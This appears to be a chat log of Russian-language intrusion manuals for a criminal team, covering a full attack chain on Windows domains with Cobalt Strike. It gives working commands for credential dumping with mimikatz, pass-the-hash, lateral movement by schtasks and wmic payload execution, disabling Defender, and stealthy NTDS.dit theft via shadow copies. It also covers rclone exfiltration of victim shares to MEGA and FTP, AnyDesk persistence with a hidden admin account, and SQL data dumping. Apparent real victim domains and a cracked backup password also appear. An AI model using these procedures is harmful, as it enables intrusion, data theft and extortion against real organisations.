7:44 PM
manuals_team_C
```ПЕРВОНАЧАЛЬНЫЕ ДЕЙСТВИЯ 1) Снятие AD - позволяет нам узнать сколько в сети серверов и воркстанций, так же информация о пользователелях , у кого какая должность и тд, псле снятия ад мы делаем sorted, чтоб отсортировать только то, что нам нужно - это вам покажем позже 2) Снятие шар (sharfinder) - при помощи него, мы смотрим, куда у нас есть доступ с этим пользователем (на другие пк) 3) Керберос атака - дергает хэши из под памяти, при удачном снятии и удачном расхэшивании - ДоменАдмин нам обеспечен 4) Если у нас есть system права, при помощи команды "hashdump" и "logonpasswords" мы можем сдернуть хэши и мимикадз и у нас будут уже пороли доменного пользователя ,а бывает что и домен админа 5) Если мы нашли логин и хэш домен админа и при этом хэш мы не смогли расхэшить , мы делаем такую команду pth Domain\Admin pass(в виде хэша) , при помощи команду shell dir \\ip или имя хоста\c$ проверим доступ на сервер или воркстанций 6) Если мы нашли логин\пасс домен админа или пользака, можем одеть его токен, команда выглядит так make_token Domain\Admin Pass , если хотите снять токен , команда rev2self 7) Если на сессии есть процесс system , при помощи команды getsystem можно поднять систменые права на сесии, пункт (4) 8) Так же не забывайте смотреть процессы при помощи команды ps, там можно найти пользователя, мигрировать в его процесс > Explore > Process list > далее выбираем процесс пользователя (пользователь должен быть другой, не тот,что на сесии) и нажимаем inject,выбираем листенер SSL 9) После миграции в новго пользователя вам так же нужно снять шары, чтобы посмотреть куда с ним можно проломиться 10) Когда вы снимаете шары, то по окончанию снятия в директорию C:\ProgramData и там лежит sh.txt или shares.txt ,скачиваем, смотрим сколько есть "remote admin" в текстовике, если их больше одного, то это означает что доступ есть на другой комп 11) Нажимаем на сессии > File Browser > пишем путь \\айпи или хостнейм компа на который есть доступ\c$ , кладем туда пелойд, я его похже выдам 12) Запуска пелойда зависит от его формата ехе или длл , по запуска я потом лично обьясню 13) Пинговать сервера и воркстанции так , нам нужен p.bat,я его скину в группу. Создаем тхт, называем его domains.txt,складываем туда хостнеймы серверов или ворков. Хостнеймы беруться со снятого АД, при помощи скрипты, им покажем как пользоваться 14) Если вы нашли какой то пороль, можно его так же прогнать через smb_login - это инстурмент в metasploit, я выдам метасплойт и расскажу как им пользоваться . смб_логин покажет на какие сервера или ворки, есть доступ с этими кредами ```
```ПЕРЕХОДИМ В АГЕНТА: ПРАВОЙ КНОПКОЙ МЫШИ ПО АГЕНТУ И ЖМЕМ INTERACT 1)ПОСМОТРЕТЬ СПИСОК АДМИНИСТРАТОРОВ shell net group "domain admins" /domain 2)ИМЯ ДОМЕНА shell net view /all /domain 3)ПОСМОТРЕТЬ СПИСОК DC shell nltest /dclist:"NameDomain" 4)УЗНАТЬ СПИСОК СЕРВЕРОВ ПОДГРУЖАЕМ МОДУЛЬ PowerView ПРАВОЙ КОНОПКОЙ МЫШИ ПО АГЕНТУ Get Info > Get Servers ПОЛУЧИЛИ СПИСОК СЕРВЕРОВ 5)УЗНАТЬ СПИСОК КОМПЬЮТЕРОВ ТАК КАК МОДУЛЬ PowerView УЖЕ ПОДГРУЖЕН ПРАВОЙ КОНОПКОЙ МЫШИ ПО АГЕНТУ Get Info > Get All Computers ПОЛУЧИЛИ СПИСОК КОМПЬТЕРОВ 6)НАДО УЗНАТЬ ПАРОЛИ ВСЕХ АДМИНОВ ДОМЕНА ПРАВОЙ КНОПКОЙ МЫШИ ПО АГЕНТУ ЖМЕМ ACCESS > DUMP HASHES ПЕРЕХОДИМ ВЫШЕ ВКЛАДКА VIEW > CREDENTIALS ЗАБИРАЕМ ВСЕ ХЕШИ И ИЩЕМ АДМИНОВ ДОМЕНА 7)НАДО НАЙТИ NAS , BACKUP ЭТОЙ КОМАНДОЙ МЫ УЗНАЕМ ВСЕ ПОДСЕТИ ДАННОГО ДОМЕНА powershell Get-NetSubnet СЛЕДУЩЕЙ КОМАНДОЙ НУЖНО УЗНАТЬ НА КАКОМ IP АДРЕССЕ НАХОДИТСЯ NAS , BACKUP portscan 107.191.177.1-107.191.177.255 5000 icmp 1024 СПИСОК ПОЛЕЗНЫХ КОММАНД КОТОРЫЕ МОГУ ПРИГОДИТЬСЯ: СНЯТЬ ПРАВА АГЕНТА ДО ДЕФОЛТА rev2self ВКЛЮЧИТЬ ЮЗЕРА ЧЕРЕЗ ЦМД shell net user Администратор /active:yes ИНФОРМАЦИЯ О ПОЛЬЗОВАТЕЛЕ shell net user careadmin /domain ВКЛЮЧИТЬ RDP СОЕДИНЕНИЕ shell reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f ОТКЛЮЧЕНИЕ ДЕФЕНДЕРА powershell Set-MpPreference -DisableRealtimeMonitoring $true ОБНОВЛЕНИЕ ПОЛИТИК shell repadmin /syncall /AdeP ПОКАЗАТЬ ТРАСТЫ ДОМЕНОВ shell nltest /domain_trusts /all_trusts ЗАПУСК ПРОГРАММЫ НА ДРУГОМ ПК shell wmic /node:"ИМЯ ПК" process call create "КОМАНДА КОТОРУЮ НАДО ВЫПОЛНИТЬ" ```
```КАК И КАКУЮ ИНФУ КАЧАТЬ 1) После того как мы подняли права, нашли Домен Админа, мы тянем сесии в кобальт 2)Одеваем токен ДА и Снимаем шары таким образом : *powershell-import - аплоудим туда ShareFinder как обычно и комнаду даем следущюю - psinject 7080 x64 Invoke-ShareFinder -CheckShareAccess -Verbose | Out-File -Encoding ascii C:\ProgramData\found_shares.txt Далее изучаем снятые шары , нас интересуют *Финанс доки *Бухгалтерия *Айти *Клиенты *Проекты И так далее, все зависит от того,чем занимаеться наш таргет Далее делаем следущее > вот Мануал от Diablo , все лего доступно и понятно Рклон для того что бы начать скачивать через рклон нужно создать конфиг для создания конфига необходимо открыть cmd перейти в дирикторию туда где лежит rclone.exe запускаем rclone.exe с помощью команды : rclone config далее выбираем в появившемся меню new remote называем его mega потом еще раз вводим мега после этого вводим адрес почты меги после он спросит свой пасс вводить или сгенерировать мы выбираем свой буквой 'Y' пасс не будет появляться при вставке однако он туда все равно вставляется после создания конфига нас выбрасывает в главное меню и мы выходит из рклона. далее вводим эту команду rclone.exe config show она покажет сам конфиг который мы создали его мы копируем и создаем фаил rclone.conf куда и кладем эту инфу. поссле того как мы нашли интересующие нас шары мы загружаем exe и конфиг на таргет машину с правами прячем конфиг и экзешку что бы их не нашли переходим в дерикторию экзешки и даем команду: shell rclone.exe copy "\\envisionpharma.com\IT\KLSHARE" Mega:Finanse -q --ignore-existing --auto-confirm --multi-thread-streams 12 --transfers 12 где: \\envisionpharma.com\IT\KLSHARE это шары Mega:Finanse расположение файлов в меге (может самостоятельно создавать папку в мегу стоит только тут ее указать) streams 12 --transfers 12 это колличество потоков которые качают на максимум(12) не рекомендую так как можно легко спалиться shell rclone.exe copy "\\PETERLENOVO.wist.local\Users" ftp1:uploads/Users/ -q --ignore-existing --auto-confirm --multi-thread-streams 3 --transfers 3 - вот пример в данном случае на ФТП !!!САМ РКЛОН ВЕСИТ ПОРЯДКА 50МБ, ССЫЛКА НА НЕГО БУДЕТ НИЖЕ ПОСТА!!! ```
Рклон залью позже. Сразу списком выложу все
```КАК ПРЫГАТЬ ПО СЕССИЯМ С ПОМОЩЬЮ ПЕЙЛОАД Команды для запуска пелойда, что бы подтянуть сессию в кобальт 1)shell SCHTASKS /s MS040926754153 /RU "SYSTEM" /create /tn "WindowsSensor15" /tr "cmd.exe /c C:\ProgramData\P32.exe" /sc ONCE /sd 01/01/1970 /st 00:00 2)shell SCHTASKS /s MS040926754153 /run /TN "WindowsSensor15" 3)shell schtasks /S MS040926754153 /TN "WindowsSensor15" /DELETE /F вместо MS040926754153 вставляешь ипак тачки по очереди команды долбишь 1) создание таска с пейлоадом 2) врубание 3) удаление Запуск ВМИКОМ им пользуемся чаще 1)если это ДЛЛ, то shell wmic /node:192.168.104.13 process call create "rundll32.exe C:\ProgramData\x64.dll StartW" Соответсвенно где айпи, вставляем айпи машины на котрую имеем доступ, дальше идет путь и название нашей длл, думаю синтаксис понятен Если вы находитесь на РДП > открыаем CMD от администратора и rundll32.exe C:\ProgramData\x64.dll,StartW сотвественно путь можете указать любой, в соотвествии где лежит ваша длл Для EXE формата или формата .bat запуск ВМИКОМ такой shell wmic /node:10.28.0.3 process call create "C:\ProgramData\j1.exe" ```

test

7:56 PM
```Как сортировать собраный АД с сети 1)Скачиваем FileZilla 2)Скачиваем Putty,пускаем Putty через тор Идем сюда torproject.org/download/tor/ Качае ВНИМАНИЕ Expert Bundle Разархивируем, идем в каталог Tor и запускаем tor.exe Через несколько секунд дойдет до написи 100% Done В настройках Putty заходим в прокси, ставим сокс5, айпи 127.0.0.1 порт 9050 3)Заходим через файлзиллу на сервер > заходи в директорию "Script" - кладем рядом со скриптом АД файлы 4) Переходим в Putty, заходим на сервер, переходи в директорию где лежит скрипт, даем команду ./script.sh 5) Готово, заходи обратно в FilleZilla и забираем наш сортед. После себя обязательно удляйте файлы АД и папку сортед, если папка сортед не удалятеся, просто переменуйте ее в любое название ```
```1. У ВАС ЕСТЬ ФАЙ res.txt, ОТКРЫВАЕМ ЕГО В NOTEPAD++ 2.ЖМЕМ CTRL+F В ПОИСКОВУЮ СТРОКУ ВВОДИМ TTL 3.ЖМЕМ FIND ALL IN CURRENT DOCUMENT У ВАС СНИЗУ ПОЯВИТСЯ ОКНО С ИП 4. ИДЕМ НА САЙТ en.toolpage.org/tool/ipv4-extractor ТАМ ВСТАВЛЯЕМ ВСЕ ЧТО ПОЛУЧИЛОСЬ И ПОЛУЧАЕМ ЧИСТЫЕ ИП ```
```стопка мануалов по повышению прав, кто плохо знает английский переводим тут deepl.com github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet#active-directory-exploitation-cheat-sheet ```
```Способ беспалевного ДАМПА НТДС shell wmic /node:"DC01" /user:"DOMAIN\admin" /password:"cleartextpass" process call create "cmd /c vssadmin list shadows >> c:\log.txt" делаем запрос на листинг шэдоу копий, там есть указание даты, проверьте чтобы была свежая дата почти наверняка они там уже есть, если нет то делаем сами net start Volume Shadow Copy shell wmic /node:"DC01" /user:"DOMAIN\admin" /password:"cleartextpass" process call create "cmd /c vssadmin create shadow /for=C: 2>&1" далее в листинге шэдоу копий находим самую свежую Shadow Copy Volume: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy55 соответственно нам нужен номер копии для следующей команды shell wmic /node:"DC01" /user:"DOMAIN\admin" /password:"cleartextpass" process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy55\Windows\NTDS\NTDS.dit c:\temp\log\ & copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy55\Windows\System32\config\SYSTEM c:\temp\log\ & copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy55\Windows\System32\config\SECURITY c:\temp\log\" в c:\temp\log\ должны упасть файлы ntds.dit / security / system берём портативный консольный 7з и пакуем в архив с паролем Код: [Выделить] 7za.exe a -tzip -mx5 \\DC01\C$\temp\log.zip \\DC01\C$\temp\log -pTOPSECRETPASSWORD выкачиваем запароленный архив себе, если при декрипте файла нтдс получаем ошибку (файл повреждён), то делаем следующее Esentutl /p C:\log\ntds.dit хитрость этого способа в том, что мы по факту ничего не дампим, мы просто берём и выкачиваем нтдс чтобы не спалиться тем что вытаскиваем именно нтдс мы пакуем его в запароленный архив если у вас траблы с тем, что палят и выкидывают из сети после дампа нтдс - пробуйте этот способ его спалить можно только самим фактом какой-то утекающей даты с КД, причём проанализировать что именно вы тащите не зная пароль от архива невозможно ```
```https://t.me/peass https://t.me/antichat https://t.me/thebugbountyhunter https://t.me/club1337 https://t.me/infosec1 https://t.me/RalfHackerChannel https://t.me/in51d3 https://t.me/exploithacker https://t.me/Premium_Hacking https://t.me/DownloadCourse14 https://t.me/ViperZCrew https://t.me/techpwnews https://t.me/cyb3rhunt3r https://t.me/cveNotify https://t.me/MalwareResearch https://t.me/BugCrowd https://t.me/itsecalert Список ТГ форумов, много интересного ```

test

8:06 PM
аллиасы для метасплойта выше

test

8:17 PM
скрипт для сортировки АД
выше адфиндер, для сборки АД
1) Скрипт для сбора шар 2) Скрипт для сбора керберос 3) Скрипт для хантинга Админов
Big
Little
```Установка метасплойт на впс 1 apt-get update apt-get install curl apt-get install tmux apt-get install default-jdk apt-get install postgresql apt-get install nano apt-get install gpg curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall chmod +x msfinstall ./msfinstall 2 далее открываем nano /opt/metasploit-framework/bin/msfdb находим и коментироуем вот эти строчки # if grep -q kali /etc/os-release; then # echo "Metasploit running on Kali Linux as root, using system database сохраняем CTRL+O msfdb init ```
``` add firewall rules New-NetFirewallRule -DisplayName "New RDP Port 1350" -Direction Inbound -LocalPort 1350 -Protocol TCP -Action allow New-NetFirewallRule -DisplayName "New RDP Port 1350" -Direction Inbound -LocalPort 1350 -Protocol UDP -Action allow # add to registry new port Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" -Name PortNumber -Value 1350 # powershell Restart-Service termservice -force Меняем RDP порт ```
```Получение доступа к серверу с бекапами Shadow Protect SPX (StorageCraft) == 1. Заходим по RDP на один из серваков, в моем случае это SQL сервер. 2. на рабочем столе видим иконку софтины ShadowProtect SPX -> кликаем на нее 3. открывается gui (если запросит креды, вводим те под которыми зашли по рдп, или любого иного ДА) 4. Слева в блоке "Job Summary" видим подробное описание схемы бекапов в поле "Name" - название бекапа нашего сервера в поле "Destination" - место КУДА наш spx складывает бекапы, в виде ИМЯ_БА_СЕРВАКА (ШАРА С БЕКАПОМ НА ЭТОМ СЕРВАКЕ) из нашего примера можем сделать вывод что все бекапы сохраняются в шару с названием StorageCraft, а папки с бекапами серверов именуются названием самого сервера. 5. Зная имя бекап сервера, мы хотим получить больше представления о его структура, первым делом получаем шары командой "cmd.exe> net view \\COH-DSS3 /ALL", в ответ получаем "Error 5: Access Denied" 6. Доступа нету, пробуем стучаться учетками другими ДА - ответ тот же - ошибка н 5, логично будет предположить, что чтобы получить доступ к серверу нам нужны либо креды локального админа на этом самом серваке, либо же аккаунт особого пользователя с выделенными правами 7. Предположим что если это выделенный юзер, то он имеет схожее с софтиной\функцией имя: перебираем логины с вхождением подстрок(тут нам нужно включить фантазию): Storage Shadow Protect Craft SP SPX Backup BUUser И Т.Д. после чего делаем поиск по ntds.dit (hashes.txt.ntds) для поиска хеша, в моем случае поиск завершился успехом и я нашел юзера Humanity.local\SPAdmin (думаю тут ясно что это Shadow Protect Admin) и его хеш ce31b806821bec116ba03132ab5b3138, НО к сожалению поиск на cmd5.org не дал результата, а мне позарез нужен клирпас. (Если вам хватает хеша, то поздравляю - вы достигли результата) 8. Но если все же вам нужен клирпас или вы не смогли найти подходящего юзера, мы поймем что если софтина как то стучиться на сервак то креды ей известны, а значит они могли остаться на сервере. Пробуем сделать дамп хешей тут подробно расписывать не буду как это сделать, но вы должны попробовать hashdump(и его легитимные аналоги) и logonpasswords(и аналоги) В моем случае я воспользовался мимиком и сдампил лсасс, в котором нашел клирпас от моей учетки SPAdmin - kerberos : * Username : SPAdmin * Domain : COHBackup * Password : Backup!User (в моем случае почему то домен был не Humanity.local а COHBackup, хотя вы можете постучаться и с Humanity.local(заменить на свое значение)) 9. Переходим в проводник, и открываем через него необходимую шару "\\COH-DSS3\StorageCraft" у меня запрашивает креды, я ввожу COHBackup\SPAdmin и Backup!User и успешно получаю доступ 10. Так же в некоторых сетках бекап серверов может быть несколько, как вариант проверить это, это нажать на кнопку Backup в левом верхнем углу гуи(сразу после File) далее - Destinations -> и увидим какие есть пути для сохранения бекапов === ```
``` Закреп AnyDesk - ознакомиться всем Function AnyDesk { mkdir "C:\ProgramData\AnyDesk" # Download AnyDesk $clnt = new-object System.Net.WebClient $url = "http://download.anydesk.com/AnyDesk.exe" $file = "C:\ProgramData\AnyDesk.exe" $clnt.DownloadFile($url,$file) cmd.exe /c C:\ProgramData\AnyDesk.exe --install C:\ProgramData\AnyDesk --start-with-win --silent cmd.exe /c echo J9kzQ2Y0qO | C:\ProgramData\anydesk.exe --set-password net user oldadministrator "qc69t4B#Z0kE3" /add net localgroup Administrators oldadministrator /ADD reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v oldadministrator /t REG_DWORD /d 0 /f cmd.exe /c C:\ProgramData\AnyDesk.exe --get-id } AnyDesk Выполняем код в Powershell ISE Run As Admin На выходе получаем ID Сохраняем его к себе На отдельном дедике\впс\виртуалке скачиваем Anydesk указываем ID Жмем Console Account Вводим пароль Цитировать J9kzQ2Y0qO И далее авторизываемся локальным админом либо доменной учеткой и пользуемся прелестями Anydesk Также можно скачать\загрузить на\с машину жертвы что бывает удобно в осмотре и поиске документации точечно. ```
Хороший закреп, рекомендую
```0. посмотреть кто работает с базой (хосты и юзеры откуда к ней коннектились) shell sqlcmd -S localhost -Q "select loginame, hostname from sys.sysprocesses" 1. Вывод в кмд всех баз данных на сервере shell sqlcmd.exe -S localhost -E -Q "SELECT name FROM master.dbo.sysdatabases;" с размером в мегабайтах shell sqlcmd -S localhost -E -Q "SELECT d.name, ROUND(SUM(mf.size) * 8 / 1024, 0) FROM sys.master_files mf INNER JOIN sys.databases d ON d.database_id = mf.database_id WHERE d.database_id > 4 GROUP BY d.name ORDER BY d.name;" 2. Выгрузка 100 самых насыщенных по количество рядов таблиц в базе данных, количества рядов и размера таблиц на винче sqlcmd -S localhost -E -Q "USE %databasename% SELECT TOP 100 s.Name AS SchemaName, t.Name AS TableName, p.rows AS RowCounts, CAST(ROUND((SUM(a.total_pages) / 128.00), 2) AS NUMERIC(36, 2)) AS Total_MB FROM sys.tables t INNER JOIN sys.indexes i ON t.OBJECT_ID = i.object_id INNER JOIN sys.partitions p ON i.object_id = p.OBJECT_ID AND i.index_id = p.index_id INNER JOIN sys.allocation_units a ON p.partition_id = a.container_id INNER JOIN sys.schemas s ON t.schema_id = s.schema_id GRчфOUP BY t.Name, s.Name, p.Rows ORDER BY RowCounts desc, Total_MB desc;" 2.1. sqlcmd -S localhost -E -Q "USE %databasename% SELECT TOP 100 s.Name AS SchemaName, t.Name AS TableName, p.rows AS RowCounts, CAST(ROUND((SUM(a.total_pages) / 128.00), 2) AS NUMERIC(36, 2)) AS Total_MB FROM sys.tables t INNER JOIN sys.indexes i ON t.OBJECT_ID = i.object_id INNER JOIN sys.partitions p ON i.object_id = p.OBJECT_ID AND i.index_id = p.index_id INNER JOIN sys.allocation_units a ON p.partition_id = a.container_id INNER JOIN sys.schemas s ON t.schema_id = s.schema_id GROUP BY t.Name, s.Name, p.Rows ORDER BY RowCounts desc, Total_MB desc;" 3. Подсчет строк в конкретной таблице конкретной базы данных sqlcmd -S localhost -E -Q "select count(*) from %databasename%.dbo.%tablename%;" 4. Выгрузка первых 10 записей в конкретной таблице конкретной базы данных sqlcmd -S localhost -E -Q "select top 10 * from %databasename%.dbo.%tablename%;" sqlcmd -S localhost -E -Q "use %databasename%; select top 10 * from %tablename%" -W 5. Поиск по названиям колонок в конкретной базе данных на примере %pass% sqlcmd -S localhost -E -Q "select COLUMN_NAME as 'ColumnName', TABLE_NAME as 'TableName' from %databasename%.INFORMATION_SCHEMA.COLUMNS where COLUMN_NAME like '%pass%';" 6. Выгрузка данных содержимого конкретных колонок из определенной таблицы в txt файл на винч в папку (в данном примере по числому значению таблицы > даты sqlcmd.exe -S localhost -E -Q "select UserKey, EmailAddress, RealName, Phone, FirstName, LastName, CountryName, CreatedDate from %databasename%.dbo.%tablename% where CreatedDate > '2017-11-30';" -W -s"|" -o "C:\temp\123.txt" FULL > sqlcmd.exe -S localhost -E -Q "select * from %databasename%.dbo.%tablename%" -W -s"|" -o "C:\Windows\Temp\1.txt" 7. Вывод всех таблиц конкретной бд shell sqlcmd -S localhost -E -Q "use %databasename%; exec sp_tables" -W для удаленного/другого локального сервера меняем localhost на ip,port как вариант - localhost,%port% (смотреть нетстатом) Если таблица или база называется из 2-3-4 слов - то экранируется вот так [%databasename/tablename%] sqlcmd -E -S localhost -Q "BACKUP DATABASE databasename TO DISK='d:\adw.bak'" ```
Так мы крутим СКУЛи
Тут мануал по мс_17 , ВАЖНО!!!
```Расскажу еще момент про ad_users , там очень много информации о сотрудниках, там можно найти технарей, инженеров и тд. Нам обычно требуеться ad_users когда хотим найти тачку админа, потому что на тачках админа мы можем найти пороли от антивирусной консоли,от облачных бэкаппов и тд. Сейчас скину мануал по ЮЗЕРХАНТЕРУ, при помощи него, мы и находим эти тачки. Так же ad_users требуеться нам, чтоб взять от туда SID, для голден тикета, но об этом позже 1. составляем список таргетов 1.1 Открываем ад_юзерс , ищем там кто нам потенциально интересен : admin / инженер / информ технологи / ИТ забираем логины учеток из sAMAccountName 1.2 Берём список домен админов 1.3 кладём в файл list.txt первых и вторых 2. Аплоадим пауэр вью. 2.1 powershell-import _/home/user/soft/powerview/view.ps1_ 2.1 --коммент: импортируем пауэр вью из /home/user/soft/powerview/view.ps1 2.3 Врубаем хантинг 2.3.1 psinject 1884 x64 Invoke-UserHunter -Threads 20 -UserFile C:\ProgramData\list.txt >> C:\ProgramData\out.txt вместо 1884 - ПИД процесса куда нам хватает прав сделать инжект. х64 - или х86 разрядность процесса. см в тасклист В с\программдата\лист.тхт должен лежать список который мы делали в пункт №1. через 5-10-20 минут смотреть резалт в аут.тхт. Как заканчивает сразу пополняет его разом. то есть если файл 0байт значит работает либо АВ попалил(если попалил ав то в кобе увидите) ```
выше скрипты для кобальта, просьба не юзать их находясь на общей кобе. + к ознакомлению
```1. СОЗДАЕМ НА РАБОЧЕМ СТОЛЕ TXT ФАЙЛ С НАЗВАНИЕ domains.txt 2. У ВАС ЕСТЬ СОРТЕД ИЛИ ПРОСТО ЛОКАЛЬНЫЕ ИМЕНА КОМПЮТЕРОВ ЗАНОСИМ ИХ В ЭТОТ ФАЙЛ 3. ЗАЛИВАЕМ НА МАШИНУ (C:\ProgramData\) С КОТОРОЙ БУДЕТ ИДТИ ПИНГ ФАЙЛ domains.txt и p.bat 4. ЗАПУСКАЕМ p.bat С ПОМОЩЬЮ КОМАНДЫ shell 5. ПОСЛЕ ПИНГА СКАЧИВАЕМ ФАЙЛ res.txt ```
Так мы пингуем хосты